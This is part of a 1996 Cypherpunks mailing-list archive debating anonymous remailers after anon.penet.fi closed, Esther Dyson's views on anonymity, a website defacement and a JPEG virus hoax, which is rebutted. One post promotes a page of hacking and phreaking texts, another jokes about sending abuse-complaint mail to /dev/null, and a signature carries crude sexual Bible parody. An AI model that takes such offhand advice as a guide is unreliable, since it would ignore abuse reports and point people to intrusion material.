The tendency of the Press to label people with organizations >affiliation ship gives the impression of organizational views. For example I >certainly don't speak for the University of Pennsylvania when I say thing to >the newspapers. > >Dave > At CFP in '95 in SF, Esther expressed the view that there was a place on the Net for an anonymous ghetto (my words not hers) where people could be anonymous but that most of the net would involve traceability of transactions so that people could be held accountable and that businesses and individuals would want to know who they were dealing with for payment and accountability reasons. I am not stating her position well I'm sure but it was clear that she thought that non-anonymity would be the rule not because it was mandated but just because Net actors would want it that way. A short quote would not allow anyone to understand her full position. If she believes that anonymity would be rejected voluntarily for practical reasons then that is just a prediction of a market not a conclusion. Most on this list would have no objection to making a prediction though we might disagree with it. Just as Esther predicted that the net would end copyright, we might predict that the net combined with immediate settlement payment systems might reduce if not eliminate the need for "positive ID." DCF From markm at voicenet.com Sun Sep 1 13:19:20 1996 From: markm at voicenet.com (Mark M.) Date: Mon, 2 Sep 1996 04:19:20 +0800 Subject: Moscowchannel.com hack In-Reply-To: <199609011509.KAA26254@manifold.algebra.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 1 Sep 1996, Igor Chudov @ home wrote: > snow wrote: > > > > On Sat, 31 Aug 1996, Joel McNamara wrote: > > > > > Not really crypto, but related to the DOJ hack in a way. > > > > > > Moscow Channel is a pretty slick, Russian news/commentary page. 
Their Web > > > site was hacked and altered by someone who didn't seem to like Russians all > > > Just a matter of time before some builds a dedicated Satan type tool that > > > scans for HTTP server holes or messed up file permissions to make locating > > > potential victims easy. > > Write your web site to a CD-ROM and hard-code the base directory into the > > webserver. > > A hacker who has root can forcibly unmount the cdrom and mount another > directory on that node. Not a good solution. As soon as the sysadmin finds out, said directory can be unmounted and CD-ROM device can be remounted. Besides, if someone manages to get root access on any machine, the sysadmin of that machine is basically screwed anyway. It's much better than having to back up the web page on a tape and having to restore the data when it is altered. - -- Mark PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From bdavis at thepoint.net Sun Sep 1 13:25:32 1996 From: bdavis at thepoint.net (Brian Davis) Date: Mon, 2 Sep 1996 04:25:32 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: > Brad Dolan wrote: > Isn't that mostly an American thing? > > bd But we've taught them so much .... bd2 > On Sun, 1 Sep 1996, Brian Davis wrote: > > > On Sat, 31 Aug 1996, Timothy C. May wrote: > > > > > To be blunt, if Singapore wants to stop me from discussing the dictator Yew > > > and his feeble son, they can't. 
Except by pulling the plugs on forums in > > > which my posts are carried. I consider this a Good Thing (that politicians > > > in Country A generally have no power to tell citizen-units in Country B > > > what they can say and what they can't). > > > > > > Unless they adopt "Assassination Protection [of the "ignorant" masses]!! > > > > And they won't use remailers ... > > > > EBD > > > > > > > > --Tim May > > > > > > > > > -- > > > [This Bible excerpt awaiting review under the U.S. Communications Decency > > > Act of 1996] > > > And then Lot said, "I have some mighty fine young virgin daughters. Why > > > don't you boys just come on in and fuck them right here in my house - I'll > > > just watch!"....Later, up in the mountains, the younger daughter said: > > > "Dad's getting old. I say we should fuck him before he's too old to fuck." > > > So the two daughters got him drunk and screwed him all that night. Sure > > > enough, Dad got them pregnant, and had an incestuous bastard son....Onan > > > really hated the idea of doing his brother's wife and getting her pregnant > > > while his brother got all the credit, so he pulled out before he > > > came....Remember, it's not a good idea to have sex with your sister, your > > > brother, your parents, your pet dog, or the farm animals, unless of course > > > God tells you to. [excerpts from the Old Testament, Modern Vernacular > > > Translation, TCM, 1996] > > > > > > > > > > > > From bdolan at use.usit.net Sun Sep 1 13:33:00 1996 From: bdolan at use.usit.net (Brad Dolan) Date: Mon, 2 Sep 1996 04:33:00 +0800 Subject: DON'T Nuke Singapore Back into the Stone Age In-Reply-To: Message-ID: Isn't that mostly an American thing? bd On Sun, 1 Sep 1996, Brian Davis wrote: > On Sat, 31 Aug 1996, Timothy C. May wrote: > > > To be blunt, if Singapore wants to stop me from discussing the dictator Yew > > and his feeble son, they can't. Except by pulling the plugs on forums in > > which my posts are carried. 
I consider this a Good Thing (that politicians > > in Country A generally have no power to tell citizen-units in Country B > > what they can say and what they can't). > > > Unless they adopt "Assassination Protection [of the "ignorant" masses]!! > > And they won't use remailers ... > > EBD > > > > > --Tim May > > > > > > -- > > [This Bible excerpt awaiting review under the U.S. Communications Decency > > Act of 1996] > > And then Lot said, "I have some mighty fine young virgin daughters. Why > > don't you boys just come on in and fuck them right here in my house - I'll > > just watch!"....Later, up in the mountains, the younger daughter said: > > "Dad's getting old. I say we should fuck him before he's too old to fuck." > > So the two daughters got him drunk and screwed him all that night. Sure > > enough, Dad got them pregnant, and had an incestuous bastard son....Onan > > really hated the idea of doing his brother's wife and getting her pregnant > > while his brother got all the credit, so he pulled out before he > > came....Remember, it's not a good idea to have sex with your sister, your > > brother, your parents, your pet dog, or the farm animals, unless of course > > God tells you to. [excerpts from the Old Testament, Modern Vernacular > > Translation, TCM, 1996] > > > > > > > From tcmay at got.net Sun Sep 1 13:34:02 1996 From: tcmay at got.net (Timothy C. May) Date: Mon, 2 Sep 1996 04:34:02 +0800 Subject: Conservation Laws, Money, Engines, and Ontology Message-ID: Keywords: agoric systems, computational ecologies, resource auctioning, Mark Miller, K. Eric Drexler, Bernardo Huberman, contracts, distributed trust, metered usage, software objects, software ICs, superdistribution, Brad Cox, emergent order. In physics there are various conservation laws: conservation of energy, mass, charge, and whatnot. You all know about this... Conservation of mass says that mass is neither created nor destroyed. (For smart aleck quibblers, conservation of mass-energy.) 
How does this relate to our issues? "Abuse of Resources": Mail loops, infinite loops, spamming, overloads of networks, and congestion in general are cases where "unrealistic" models of costs are implemented in software. In the real physical world, infinite loops don't occur (at least not in the sense seen with mail loops, as a relevant example.) Conservation laws are related to the "cost model" of the universe. Real physical objects have costs, or ontological status, or presence.... (Please don't read too much into this point...I mean to be suggestive, not literal.) There are no "memory leaks" in the universe which suddenly fill it up with stuff, no perpetual motion machines, no creation and destruction of objects. Cyberspace Ontologies: There are several things which need to be done to make the cyberspatial world more like the spatial world: * payment for CPU cycles consumed (via contractual, permission-based access: "If you want access to this machine, here are the terms and conditions.") * metering mechanisms, such as e-stamps for e-mail (essentially a special case of the first point, where a machine says "I'll pass on your message if you pay me to.") * digital contracts, agreements on usage and payment (resource auctioning, or the "smart contracts" that Nick Szabo has written about) (you can all think of additional examples....) Cryptographic protocols have their uses here, but there are also some other measures which bear looking into. In the LISP community, for example, work has been done on "engines," which are building blocks that are "fueled up" with "CPU fuel" and allowed to run for some amount of CPU cycles. Thus, one could put an engine into a process and it would run for some number of ticks, then stop. (I'm sure there are Unix-level tools which do similar things, in terms of giving a spawned process so many ticks of the clock. 
The "engines" concept is somewhat more semantically clean, in that it's pushed down into the "ontology" of the thing being simulated or run, and is not at the "God level" (to use a non-technical term!).) Now, certainly I support the right of any person or machine to run programs freely and without charge, to pass on e-mail free of charge, to run remailers for no charge, to accept spam mail without complaint, and so on. What I'm suggesting is that many of the problems being seen with overuse of resources, spam, congestion, and denial of service are really due to a poor model of resource allocation. Unix and other modern operating systems offer various tools for helping to constrain such problems, but, I submit, better methods are needed. (Especially when multiple machines, networks, and even anonymous sites are part of the overall system....clearly the constraints must be managed locally, and via "contract," as part of a computational ecology, and not as a hierarchical, top down Unix-type operating system.) Economics is about the "allocation of scarce resources." Many of the existing models being used treat various scarce resources as _free_. Then, when the inevitable problems occur, calls for top-down regulation are heard (e.g., the frequent calls for illegalization of "unwanted mail"). In my view, building a consistent, distributed, "conservative" system is what Cypherpunks need to be thinking about. (I used the term "conservative" in the physics sense. A system in which various conservation laws are obeyed.) As I said before, this should not be compelled, but voluntary. However, those who give their resources away for free (choosing not to adopt a conservative ontology, in other words) should be in no position to complain or run to the government for top-down regulation because there freely-given resources are being overused or "abused" (in their thinking). 
And closely related to this whole issue--and something I've written about extensively--is the issue of "building walls in cyberspace." In the real world, persistent structures are build out of real materials, resulting in castles, forts, skyscrapers, bridges, houses, highways, etc. These objects have persistence, have controllable access (gates, doors, locks,...), and have "structural integrity." Cryptographic and distributed trust protocols are about the only means I can think of for constructing the equivalents in cyberspace. (And to a large extent, this is already happening: the Net and the Web have structure which cannot be demolished casually, or by top-down orders from any single national leader. Millions of machines, linked in various ways and implementing various protocols and "terms of service" with users and other machines....an early version of the "conservative" system I think we'll someday see.) Well, this gives the flavor of my points. I haven't rigorously argued all of the points, but the Cypherpunks forum is for presenting informal arguments. Thoughts? --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Licensed Ontologist | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From attila at primenet.com Sun Sep 1 13:43:58 1996 From: attila at primenet.com (attila) Date: Mon, 2 Sep 1996 04:43:58 +0800 Subject: WARNING vIRuS! Message-ID: <199609011900.NAA07748@InfoWest.COM> kickboxer is full of shit --or trolling. since when can a jpeg or gif file viewer execute anything --nothing starts automatically, in any operating system. that is expecting a jump call of some sort. 
we haven't yet fallen into the impending insecure abyss of MS objects. to have a piece of code embedded execute, a "start-up" program would need to be previously passed to the target machine which literally scanned all memory for the startup sequence in the foreign material --and translate it. on unix, the code would need to be sophisticated enough to remove itself from the process table --even in sleep modes. and, in any system, the startup sequence must be readable, and therefore traceable by anti-virus routines. now that kickboxed has baited the hook for trolling, what new wet dream will we have for rebuttals?!? On Sat, 31 Aug 1996, kickboxer wrote: > There is a new and VERY dangerous virus called the HAZ-MAT virus! > it fucks up the sectors on your hd, and really messes up the partition > tables. It does this once a week, picking a random time to do it. 99.9% of > virus scanners and other antivirus programs will not recognize it, for it is > a totally new strain, using a never before seen code.... Be warned! The > HAZ-MAT virus usually resides in JPG, and GIF files... once the files are > viewed, the virus takes effect. > scan all images upon download! > > > -- you can fool all of the people some of the time, you can fool some of the people all the time, but you can not fool all the people all the time. --Lincoln? cc: Paul Penrod From ichudov at algebra.com Sun Sep 1 14:18:17 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Mon, 2 Sep 1996 05:18:17 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: Message-ID: <199609011922.OAA31806@manifold.algebra.com> =?ISO-8859-1?Q?J=FCri_Kaljundi?= wrote: > Sun, 1 Sep 1996 paul at fatmans.demon.co.uk wrote: > > > I don`t know what the response to this will be, I need approximately > > 5000 UK pounds to set up such an operation (Yes, a leased line really > > does cost that much in the UK) and then a monthly income of around > > 3000 UK pounds. 
> > I remember the load on anon.penet.fi was something like 7500 messages > daily. As for connection, you will need 64kbps line or even less in case > you compress the messages. The machine could be either an older Sun Sparc > or a PC running free Unix (Linux/FreeBSD/...) A couple of notes: 7500 messages/day is not the accurate measure of the load of anon.penet.fi. Remember that each messages had to 1) come in 2) be processed 3) be sent out 4) trigger a confirmation sent to the submitter It is not the same as a user simply receiving 7500 messages/day. If we suppose that each message creates 10KB of IP traffic, it gives us 75MB/day. 75mb/day is less than 1KB per second. It can be handled by a simple 28.8KBPS PPP connection which will still half the capacity to grow twice. A second dedicated phone line and a second modem can be added later. I suspect that UUCP as opposed to IP connection will work better, because UUCP gives us a unidirectional flow of data, which is much more efficient than modems switching direction of the transport for almost each IP packet. I suggest the following configuration: a IBM 486 PC with 16MB of RAM and 28.8 modem, running qmail instead of sendmail and Linux, on a dedicated 28.8 PPP line. The cheapest used VGA display from the nearby waste dump will work just fine. Estimated cost: $700-1000 for the system, $50-100/month for the connection, and 3 hours per day to deal with mailbombing from disgruntled usenet kooks like the right reverend colin james iii (puke). - Igor. From crichardson at earthlink.net Sun Sep 1 14:23:55 1996 From: crichardson at earthlink.net (Conner Richardson) Date: Mon, 2 Sep 1996 05:23:55 +0800 Subject: hackers texts Message-ID: I working on a WWW page for people who want to recieve text articles on hacking/phreaking/etc. It's not very extensive now, but were working on it. Point your browswer to: http://home.earthlink.net/~crichardson/omega.html Also on this page are some files, as well as some other misc indexes. 
All feedback is apprechiated. -flux From farber at central.cis.upenn.edu Sun Sep 1 14:27:23 1996 From: farber at central.cis.upenn.edu (Dave Farber) Date: Mon, 2 Sep 1996 05:27:23 +0800 Subject: Esther Dyson on Remailers Message-ID: <3.0b11.32.19960901153719.006f4b00@linc.cis.upenn.edu> Just for record, Esther's position is NOT necessarily EFFs. At 01:39 PM 9/1/96 -0400, Duncan Frissell wrote: >At 06:52 AM 9/1/96 -0400, Dave Farber wrote: >>EFF does not, to my knowledge, (and I am a Board Member) have an >>organizational view on this issue. There are a lot of different views and >>each member of EFF has their own view that they can and will state as >>private people. The tendency of the Press to label people with organizations >>affiliation ship gives the impression of organizational views. For example I >>certainly don't speak for the University of Pennsylvania when I say thing to >>the newspapers. >> >>Dave >> > > >At CFP in '95 in SF, Esther expressed the view that there was a place on the >Net for an anonymous ghetto (my words not hers) where people could be >anonymous but that most of the net would involve traceability of >transactions so that people could be held accountable and that businesses >and individuals would want to know who they were dealing with for payment >and accountability reasons. > >I am not stating her position well I'm sure but it was clear that she >thought that non-anonymity would be the rule not because it was mandated but >just because Net actors would want it that way. A short quote would not >allow anyone to understand her full position. > >If she believes that anonymity would be rejected voluntarily for practical >reasons then that is just a prediction of a market not a conclusion. Most >on this list would have no objection to making a prediction though we might >disagree with it. 
> >Just as Esther predicted that the net would end copyright, we might predict >that the net combined with immediate settlement payment systems might reduce >if not eliminate the need for "positive ID." > >DCF > > > From qut at netcom.com Sun Sep 1 14:31:07 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 05:31:07 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: <841590548.16439.0@fatmans.demon.co.uk> Message-ID: <199609011943.MAA08988@netcom3.netcom.com> ! I wish to gauge the response on something here: ! ! Following the closure of the anon.penet.fi remailer: ! ! If I can get enough funding to cover all expenses (I am a student and ! cannot unfortunately contribute much myself) I will install lines and ! hardware at my premises and run the equivalent to the anon.penet.fi ! remailer. ! ! I don`t know what the response to this will be, I need approximately ! 5000 UK pounds to set up such an operation (Yes, a leased line really ! does cost that much in the UK) and then a monthly income of around ! 3000 UK pounds. No way, dude. You can run even an unrestricted T1 here for quite a bit less than £3000. All you need though, is a flat rate dedicated 28,800 modem connection, which has a monthly fee of about £50-100, but we're a little spoiled in the Bay Area. Whatever the fees are there, you could put up something pretty cool as a free server, and perhaps also figure out a way to sell the excess bandwidth at a profit. Whatever you do, stick to one of the unices like linux. Our brief experiences with trying to make Windows 3.0 and Win95 useful convinced us that nothing good can come from Micro$oft. We're planning on starting a modem server as soon as we can get our hardware BS problems sorted out. We'll try installing the cypher punk goodies like Mixmaster. We're planning on a 100% open server that can be telnet 'ed into so we can be open to suggestions to improve security and solicit advice. 
From porsche at themall.net Sun Sep 1 14:43:44 1996 From: porsche at themall.net (Herbert Feran) Date: Mon, 2 Sep 1996 05:43:44 +0800 Subject: FW: get me off of this list!!!!! Message-ID: --- On Sun, 1 Sep 96 12:41:21 PDT Herbert Feran wrote: I need to be taken off of this list but I can't remeber the code to desubscribe. Can anyone tell me what the code is? ------------------------------------- Name: Herbert Feran E-mail: Herbert Feran Date: 9/1/96 Time: 12:41:21 PM This message was sent by Chameleon ------------------------------------- -----------------End of Original Message----------------- ------------------------------------- Name: Herbert Feran E-mail: Herbert Feran Date: 9/1/96 Time: 12:48:19 PM This message was sent by Chameleon ------------------------------------- From qut at netcom.com Sun Sep 1 15:02:23 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 06:02:23 +0800 Subject: Bob Dole is on Drugs In-Reply-To: <199609011633.LAA30982@manifold.algebra.com> Message-ID: <199609012004.NAA11397@netcom3.netcom.com> ! http://allpolitics.com/news/9608/31/radio.addresses/ ! ! ... snip ... ! ! Dole, who returned to Washington for Labor Day ! weekend, also pledged to use the White House as a ! bully pulpit to promote the "moral message" ! against drugs and to criticize what he called the ! entertainment industry's glamorization of drug use. ! ! On Sunday, he is to address the convention of the ! National Guard Association of the United States ! during which he's expected to propose that the ! military be enlisted to assist in a renewed war on ! drugs. So why didn't you support Pat Buchanan for president, the ONLY candidate to support even a partial legalization of marijuana? Speaking of legalizing drugs, wouldn't it be a good tactic to demand the absolute legalization of ALL drugs? The compromise eventually to follow would be a vast improvement over the status quo. 
I'm voting Libertarian, and thinking of registering as such, even though I can't stand their capitalist economics, they stand by allowing people to organize and speak out against the very ideals that allowed them to do such. Our government is so corrupt, swinging a figurative axe against it could very well lead to improvement. From matthew at itconsult.co.uk Sun Sep 1 15:18:06 1996 From: matthew at itconsult.co.uk (Matthew Richardson) Date: Mon, 2 Sep 1996 06:18:06 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: <841590548.16439.0@fatmans.demon.co.uk> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > I don`t know what the response to this will be, I need approximately > 5000 UK pounds to set up such an operation (Yes, a leased line really > does cost that much in the UK) and then a monthly income of around > 3000 UK pounds. I have looked into UK line costs recently and I suspect that the suggested costs do sound perhaps a little high. Although the set up cost is probably OK, I would suggest that the running costs (assuming that these comprise the circuit charge and payment to an ISP) could be less that half that quoted. What you have been quoted may well depend on who you have spoken to. Best wishes, Matthew From jamesd at echeque.com Sun Sep 1 15:23:48 1996 From: jamesd at echeque.com (James A. Donald) Date: Mon, 2 Sep 1996 06:23:48 +0800 Subject: Sen. Leahy's "impeccable cyberspace credentials" Message-ID: <199609012034.NAA11901@dns1.noc.best.net> At 06:11 PM 8/31/96 EDT, patrick b cummings wrote: > I agree with what you are saying but not all polititions are that bad. > You make it sound as if their are no politisions are for freedom of the > net. 
So who is the exception? --------------------------------------------------------------------- | We have the right to defend ourselves | http://www.jim.com/jamesd/ and our property, because of the kind | of animals that we are. True law | James A. Donald derives from this right, not from the | arbitrary power of the state. | jamesd at echeque.com From markm at voicenet.com Sun Sep 1 15:26:49 1996 From: markm at voicenet.com (Mark M.) Date: Mon, 2 Sep 1996 06:26:49 +0800 Subject: It is good that anon.penet.fi has been closed! In-Reply-To: <199609011733.MAA31382@manifold.algebra.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 1 Sep 1996, Igor Chudov @ home wrote: > Yes, subject says it all. anon.penet.fi was a whole lot worse than > cypherpunks remailers. It provided clueless users with no real security, > because it stored return addresses and did not use chaining and > encryption. It also provided anonymity to many people who needed it. I think that many people who need anonymity will probably just learn faking mail and news headers. Many people just don't want to deal with cpunk remailers. OTOH, I agree that this might actually force many people with Penet addresses to learn about more secure remailers. In this way, the closing of anon.penet.fi could be looked upon as a Good Thing. However, as long as there is no easy way for Windoze and Mac users to use secure remailers, users will sooner resort to fake-mailing then learning how to use cpunk remailers. People that need a pseudonym address to use on various support groups can get them from other, equally insecure, remailers. - -- Mark PGP encrypted mail prefered. 
Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ From drose at AZStarNet.com Sun Sep 1 15:52:18 1996 From: drose at AZStarNet.com (David M. Rose) Date: Mon, 2 Sep 1996 06:52:18 +0800 Subject: FW: get me off of this list!!!!! Message-ID: <199609012102.OAA01685@web.azstarnet.com> >--- On Sun, 1 Sep 96 12:41:21 PDT Herbert Feran > wrote: >I need to be taken off of this list but I can't remeber the code > >to desubscribe. Can anyone tell me what the code is? >------------------------------------- What's the frequency Herbert? Help, I've fallen and I can't remeber the code. Hint: Try consulting "The Codebreakers." From qut at netcom.com Sun Sep 1 15:52:29 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 06:52:29 +0800 Subject: anon.penet.fi: URGENT REQUEST In-Reply-To: <199609011922.OAA31806@manifold.algebra.com> Message-ID: <199609012058.NAA16695@netcom3.netcom.com> ! =?ISO-8859-1?Q?J=FCri_Kaljundi?= wrote: ! > Sun, 1 Sep 1996 paul at fatmans.demon.co.uk wrote: ! > ! > > I don`t know what the response to this will be, I need approximately ! > > 5000 UK pounds to set up such an operation (Yes, a leased line really ! > > does cost that much in the UK) and then a monthly income of around ! > > 3000 UK pounds. ! > ! > I remember the load on anon.penet.fi was something like 7500 messages ! > daily. As for connection, you will need 64kbps line or even less in case ! > you compress the messages. The machine could be either an older Sun Sparc ! 
> or a PC running free Unix (Linux/FreeBSD/...) ! ! A couple of notes: 7500 messages/day is not the accurate measure of ! the load of anon.penet.fi. Remember that each messages had to ! ! 1) come in ! 2) be processed ! 3) be sent out ! 4) trigger a confirmation sent to the submitter There's plenty of room for a hacker to improve the Kleinpaste derived server, such as eliminating confirmations unless there's an error. Queing should help a great deal. ! It is not the same as a user simply receiving 7500 messages/day. ! ! If we suppose that each message creates 10KB of IP traffic, it gives us ! 75MB/day. 75mb/day is less than 1KB per second. It can be handled by a ! simple 28.8KBPS PPP connection which will still half the capacity to grow ! twice. A second dedicated phone line and a second modem can be added ! later. ! ! I suspect that UUCP as opposed to IP connection will work better, ! because UUCP gives us a unidirectional flow of data, which is much more ! efficient than modems switching direction of the transport for almost ! each IP packet. The server can que the mail for a hour or so before sending it out all at once. ! I suggest the following configuration: a IBM 486 PC with 16MB of ! RAM and 28.8 modem, running qmail instead of sendmail and Linux, How is qmail better than sendmail? The default BSD sendmail since 8.00+ has automated ident requests built in. It can easily be compiled without that default option, for greater efficiency. ! on a dedicated 28.8 PPP line. The cheapest used VGA display from ! the nearby waste dump will work just fine. Hell, any monitor should work! I'm curious about how to go about acquiring one of those huge 100+ x 100+ charactor terminals that linux supports. Is it practical, cheap and readable? ! Estimated cost: $700-1000 for the system, $50-100/month for the ! connection, and 3 hours per day to deal with mailbombing from ln -s /dev/null /usr/postmaster ln -s /dev/null /usr/abuse That should filter the mail quite nicely! 
:-> BTW, do y'all have a favourite Bay Area store for used or otherwise affordable unice fond equiption? Such as used Sparcs or Alphas? Legal copies of commercial unice software along with the equipment? Thanks. From ichudov at algebra.com Sun Sep 1 16:38:52 1996 From: ichudov at algebra.com (Igor Chudov @ home) Date: Mon, 2 Sep 1996 07:38:52 +0800 Subject: Moscowchannel.com hack In-Reply-To: Message-ID: <199609012149.QAA00600@manifold.algebra.com> Mark M. wrote: > > A hacker who has root can forcibly unmount the cdrom and mount another > > directory on that node. Not a good solution. > > As soon as the sysadmin finds out, said directory can be unmounted and CD-ROM > device can be remounted. Besides, if someone manages to get root access on any > machine, the sysadmin of that machine is basically screwed anyway. It's much > better than having to back up the web page on a tape and having to restore the > data when it is altered. It depends on the ratio R = (frequency of legit Web page changes) / (frequency of breakins * cost of a breakin). The lower is R, the more what you say makes sense. I suspect that in the real world R is rather high. - Igor. From qut at netcom.com Sun Sep 1 16:42:13 1996 From: qut at netcom.com (Dave Harman OBC) Date: Mon, 2 Sep 1996 07:42:13 +0800 Subject: It is good that anon.penet.fi has been closed! In-Reply-To: <199609011733.MAA31382@manifold.algebra.com> Message-ID: <199609012143.OAA20934@netcom3.netcom.com> ! Yes, subject says it all. anon.penet.fi was a whole lot worse than ! cypherpunks remailers. It provided clueless users with no real security, ! because it stored return addresses and did not use chaining and ! encryption. ! ! Maybe closing of anon.penet.fi will spur real interest from the unwashed ! alt.sex.* masses to the truly secure remailers. There has to be more crypto anonymizing aliasing remailers and with easier interfaces. 
Closing the Kleinpaste derived server will help put the pressure of demand to start better remailer systems. There's not enough capacity and reliability with the servers extant. There should be thousands of full featured remailers. We'll help out as soon as we can get the hardware problems we have figured out and provided there's understandably configurable linux networking software out there.

Would it be a good idea to have a 100% open server that anyone can telnet in and copy all the e-mail data? If the chaining crypto remailers are reliable, there's no reason why not, except the risk of clock cycle cryptanalysis. There should be an easy way of preventing those attacks, if not, the data can be read accessible only after the {de|en}cryption. This openness should go a long way in protection so far as liability is concerned. In other words, if Big Brother can force his way into your privacy, why not little brother?

From edyson at edventure.com Sun Sep 1 17:04:19 1996
From: edyson at edventure.com (Esther Dyson)
Date: Mon, 2 Sep 1996 08:04:19 +0800
Subject: Los Angeles Times article on Helsingius and anon.penet.fi
Message-ID: <19960901220323595.AAA208@Esther.edventure.com>

Before going into the merits of this, let me make two points: One I specifically asked the reporter (Amy Harmon) to quote me as an individual, not as a spokesperson for the EFF. (It was Amy Harmon, and the only address I have for her bounces, but as you can imagine I would like to get in touch with her! Anyone know it?) These are my personal views; EFF has no formal policy on this yet -- precisely because it's a complex issue.

Now, speaking personally: I believe there are trade-offs -- which is what I told the LA Times. I assume I was quoted accurately (although the word "enforce" is awkward), but out of context. Anonymity can be dangerous -- as can traceability, especially in/by repressive regimes.
Therefore I would favor allowing anonymity -- with some form of traceability only under terms considerably stronger than what are generally required for a wiretap. Anyone who seriously needs anonymity because of a repressive government is likely to use a foreign (outside whatever jurisdiction he fears) server, so that this is not a matter of "local" laws. The tracer would have to pass through what I hope would be tighter hoops than we have now.

Please note that this is not the same as the right to *private* conversations and the use of encryption; this is the issue of being accountable for what you publish in public.

My assumption is that there will be a wide variety of Net communities with different rules/regulations/attitudes towards anonymity that would apply ex some kind of international sanctions; I think that's appropriate.

Yes, I'm aware of the complexities, and of the possibilities for miscarriages of justice. The world isn't yet the way I want it to be. But I wanted to respond reasonably promptly.

BTW, I would welcome a chance to read the whole article (or at least a *little* more of the context, under fair use).

Speaking for myself, only (and publicly),
Esther Dyson

At 06:40 AM 9/1/96 -0400, Dave Farber wrote:
>>Posted-Date: Sun, 1 Sep 1996 14:59:53 +1000 (EST)
>>Date: Sun, 1 Sep 1996 14:59:53 +1000 (EST)
>>From: Charles Senescall
>>To: cypherpunks at toad.com
>>Cc: declan at well.com
>>Subject: Re: Los Angeles Times article on Helsingius and anon.penet.fi
>>Sender: owner-cypherpunks at toad.com
>>
>>On Sat, 31 Aug 1996, Declan McCullagh wrote:
>>
>>> The attached article was reposted to fight-censorship with the permission
>>> of the Los Angeles Times, which ran it on the front page today.
>>[snip]
>>> Note Esther Dyson's comments:
>>>
>>> "The damage that can be done by anonymity is far bigger" than in
>>> any other medium, said Esther Dyson, chairwoman of the Electronic
>>> Frontier Foundation. "In the end, you need to be able to get at
>>> somebody's identity to enforce accountability, and the question is how
>>> do you also enforce freedom of speech and freedom from prosecution for
>>> unpopular opinions."
>>
>>Is this _really_ the EFF policy on anonymous remailers??
>>
>>I will check with our local version of the EFF and see what they have to say.
>>
>>If the EFF is not for anonymity it needs to be publicised. Perhaps the
>>EFF has been in bed with the political pigs too long. *OINK*
>>
>>--
>> .////. .// Charles Senescall apache at quux.apana.org.au
>> o:::::::::/// Fuck TEL$TRA
>>>::::::::::\\\ Finger me for PGP PUBKEY Brisbane AUSTRALIA
>> '\\\\\' \\
>>
>
>

Esther Dyson Always make new mistakes!
EDventure Holdings
1 (212) 924-8800
1 (212) 924-0240 fax
104 Fifth Avenue
New York, NY 10011 USA
www.edventure.com

High-Tech Forum in Lisbon, October 27-29, 1996
PC Forum in Tucson, Arizona, March 23-26, 1997

From rishab at dxm.org Sun Sep 1 17:07:20 1996
From: rishab at dxm.org (Rishab Aiyer Ghosh)
Date: Mon, 2 Sep 1996 08:07:20 +0800
Subject: DON'T Nuke Singapore Back into the Stone Age
In-Reply-To: <1.5.4.32.19960831063502.0033b25c@giasdl01.vsnl.net.in>
Message-ID: <199609012218.PAA13546@nic.cerf.net>

Arun Mehta wrote:
> and India will be too: the law here holds the ISPs responsible
> for ensuring that nothing objectionable and obscene is carried by
> them, and what simpler way to comply than to

FWIW: "There is no need to licence content providers; Internet service providers are not responsible for illegal content." R K Takkar, Indian Telecom Secretary (at the time of interview); see http://dxm.org/techonomist/news/ndp1.html for more.

> Ideally, I should be able to
> send via pgp and anonymous remailer a request for a page, which would soon
> come beamed down unencrypted via satellite. No more waiting hours
> for the latest version of Netscape to download (!)
you'll only have to wait hours for your anonymous-remailer-web-to-e-mail gateway, EVERY time you want a page.

In one of my Electric Dreams columns, "Censorship is bad for business," (archived here and there on the Web) I wrote that governments will eventually see sense and stop censorship, if they're interested in making their countries rich. Singapore in every other field of work has shown its interest in deregulation; I would expect them to do so on the Net as well, when it becomes clear that there's rather more to it than porn and subversion. In the meanwhile, there's not much point trying to "help" them, apart from providing moral support. Incidentally, do the cypherpunk archives in Singapore, which always come out first in my AltaVista searches, not contain a trace of officially disliked content?

In this month's First Monday, due out tomorrow, Andreas Harsono - a banned Indonesian journalist who reports from Jakarta through the Internet for various foreign publications - writes on censorship in S-E Asia, and how some countries, like Indonesia, are _more_ relaxed in their treatment of on-line media than the press.

Best,
Rishab

ps. I don't read the list regularly, so reply by mail if you want a response.

First Monday - The Peer-Reviewed Journal on the Internet
http://www.firstmonday.dk/
Munksgaard International Publishers, Copenhagen
International Editor - Rishab Aiyer Ghosh (rishab at dxm.org)
Pager +91 11 9622 162187; Fax +91 11 2209608 or 2426453 or 2224058
A4/204 Ekta Vihar, 9 Indraprastha Extn, New Delhi 110092 INDIA

From ichudov at algebra.com Sun Sep 1 17:11:15 1996
From: ichudov at algebra.com (Igor Chudov @ home)
Date: Mon, 2 Sep 1996 08:11:15 +0800
Subject: It is good that anon.penet.fi has been closed!
In-Reply-To:
Message-ID: <199609012217.RAA00801@manifold.algebra.com>

Mark M. wrote:
> On Sun, 1 Sep 1996, Igor Chudov @ home wrote:
> > Yes, subject says it all. anon.penet.fi was a whole lot worse than
> > cypherpunks remailers.
It provided clueless users with no real security,
>
> It also provided anonymity to many people who needed it. I think that many
> people who need anonymity will probably just learn faking mail and news
> headers. Many people just don't want to deal with cpunk remailers. OTOH, I
> agree that this might actually force many people with Penet addresses to learn
> about more secure remailers. In this way, the closing of anon.penet.fi could
> be looked upon as a Good Thing. However, as long as there is no easy way for
> Windoze and Mac users to use secure remailers, users will sooner resort to
> fake-mailing than learning how to use cpunk remailers. People that need a
